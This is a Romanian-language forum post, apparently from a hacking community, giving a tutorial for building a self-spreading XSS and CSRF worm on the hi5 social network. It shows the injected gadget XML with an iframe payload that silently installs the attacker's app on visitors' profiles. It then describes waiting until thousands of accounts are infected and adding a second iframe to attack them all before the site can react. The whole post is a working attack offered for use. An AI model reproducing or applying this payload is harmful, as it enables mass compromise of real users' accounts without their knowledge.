Search the Community
Showing results for tags 'hi5 xss worm'.
-
Cred ca asta e cel mai simplu tutorial de pe fata pamantului cand vorbim de un web worm. UPDATED SETUP Urmati pasii de aici: http://rstcenter.com/forum/18899-rst-hi5-0day-xss-permanent.rst Folosind live http headers din firefox salvati url-ul ce adauga aplicatia pe profilul vostru cand apasati butonul Add to my profile. PROPAGAREA Modificati in casuta de edit <?xml version="1.0" encoding="UTF-8"?> <Module> <ModulePrefs title="Sample App" author_email="pulea@binkmail.com" /> <Content type="html"><![CDATA[ Hello, world! ]]></Content> </Module> cu <?xml version="1.0" encoding="UTF-8"?> <Module> <ModulePrefs title="[i]<iframe src=http://tinyurl.com/codredirect>[/i]" author_email="pulea@binkmail.com" /> <Content type="html"><![CDATA[ Hello, world! ]]></Content> </Module> Unde scrie tinyurl.com adaugati linkul catre aplicatia voastra pe care l-ati aflat folosind live http headers. Linkul aplicatiei arata cam asa http://hi5.com/friend/apps/addApp.do?referrer=&privacy=1&privacy=2&privacy=3&privacy=4&privacy=5&appId=44444&appContext=1. Va trebui sa il modificati pentru ca in locul "appId=44444" sa fie id-ul aplicatiei voastre. Adaugam linkul in image tag pentru ca este un csrf penibil si executa comanda respectiva fara ca cineva sa devina suspicios. Ori de cate ori va viziteaza Gheorgita profilul (adica cineva care este logat pe contul de hi5), va adauga fara sa stie aplicatia voastra pe profilul lui. Cei care ii viziteaza profilul lui Gheorghita la randul lor isi vor adauga fara sa stie aplicatia voastra pe contul lor. Si tot asa se imprastie singura aplicatia pe conturile vizitatorilor hi5. ATACUL Dupa ce s-au infectat mii de persoane (dureaza cateva zile doar), dati din nou edit la aplicatia voastre si adaugati iframe-ul din imaginea de mai jos dupa modelul tutorialului prezentat aici => http://rstcenter.com/forum/18899-rst-hi5-0day-xss-permanent.rst. In iframe nu uitati sa puneti linkul vostru in locul celui catre epicfail.ro. Deasemeni cititi cu atentie si primul tutorial pentru a nu da rateuri la setup. E de preferat metoda din tutorialul meu fata de un atac direct cu iframe si injectarea aplicatiilor in conturile utilizatorilor, pentru ca veti afecta mii de conturi in acelasi timp fara ca cei de la hi5 sa aiba timp sa filtreze input-urile in timp rapid. Enjoy!